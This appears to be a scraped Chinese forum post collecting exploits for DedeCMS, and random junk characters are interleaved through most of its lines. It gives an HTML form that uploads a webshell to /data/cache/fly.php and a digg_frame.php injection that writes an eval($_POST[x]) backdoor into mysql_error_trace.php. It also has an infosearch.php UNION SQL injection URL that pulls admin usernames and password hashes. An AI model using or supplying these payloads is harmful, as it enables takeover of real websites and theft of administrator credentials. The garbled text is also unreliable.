/ b1 O6 ]% x% x  C<input type='hidden' name='f' value='form1.enclosure' />
1 X! K$ V1 |5 K: L7 a, H# C& z: T<input type='hidden' name='job' value='upload' />
9 B" E- _; [& t% D<input type='hidden' name='newname' value='fly.php' />
  K' i/ g9 N% OSelect U Shell <input type='file' name='uploadfile' size='25' />" s! B3 h% U* T
<input type='submit' name='sb1' value='确定' />3 i1 w9 e. ~( s, h& F
</form>
& l1 d' e/ g8 ~- ]/ u" c" M4 Z' S<br />It's just a exp for the bug of Dedecms V55...<br />; `& t6 E. X. o, Q$ H
Need register_globals = on...<br />
" b2 E. P( H( X8 U. Q( C+ r9 U. gFun the game,get a webshell at /data/cache/fly.php...<br />
% z" E# M3 f$ P" h# k8 a( p. `</body>
* w/ |1 s* v/ i</html>
7 i. J. }( H" j, i. O8 ^: N& K( V( d& t
( P9 Y: _8 D6 L
7 X9 Z' A$ B3 Q( E9 x( n! c
1 d- C. E7 R3 @

5 A+ D8 x) g& S' M$ O8 T8 M7 i9 v- T/ I

) [, |2 O1 G( T- G+ X) V
8 `# ?! O3 Q1 O2 P. C, v& c& O0 y% q  ~8 X- ]/ c; I. [

3 V7 K/ x- R+ X( ]% ^6 d织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
+ I- O$ b3 k2 u) {利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
$ i& ]3 C: P" W# U5 J0 m1. 访问网址：
, G" U* g6 p$ A  z7 R- Vhttp://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
1 |; V' p; f+ D0 a2 G. F, s可看见错误信息7 U1 `: f" d, O5 ^/ G
: _6 F& z3 C5 _6 a  _; }( k

/ _1 M. r: C9 |6 E$ t2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。% Z% D6 k. |- v$ ~/ A( m
int(3) Error: Illegal double '1024e1024' value found during parsing  H2 }  w: j; I, F
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>% b+ E" A: ~5 b

" ~0 o' Q6 L1 \4 L4 z: t3 Q5 V
4 j9 ^4 f3 Q  w/ j1 m" \& q3. 执行dede.rar里的文件 test.html，注意 form 中 action 的地址是. g+ i/ X! V4 w+ X# B6 T

6 J2 h) G! m- p5 k$ F7 q( n1 {* p6 w4 B* J4 B6 T9 r# E# {! R# Q
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
/ ?7 U+ e5 i  e/ B2 g! \" |; v! I( n7 Y: A: v/ Y& E+ m0 B
; O/ J: n/ ]' c. [4 B$ v
按确定后的看到第2步骤的信息表示文件木马上传成功.
; z6 B: A/ ]. M- i8 h0 }+ V/ U$ Y
3 `+ J3 }2 r# B! k7 C! |+ V: f
" e5 t& C- c2 ~; |
: i1 y# l3 j7 @9 C7 Z( s8 [" e3 D- B% p7 \

; d! _3 O4 E6 e$ P
( l; F: z/ D: J$ N( h
6 f7 [/ y# m2 F' F  Q$ a: i
4 |+ K3 D4 |8 }* a
* |, S4 z$ G# }' W0 \. `3 m6 N8 |; D6 P" S# J: z: E! P  V; R% N
, i. Q0 K/ u" l3 U/ U
. q2 v' h7 B7 K* N) M# v2 }
织梦(DedeCms)plus/infosearch.php 文件注入漏洞4 t! _6 \) P% g1 a  z
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*

		自动登录	找回密码
密码			立即注册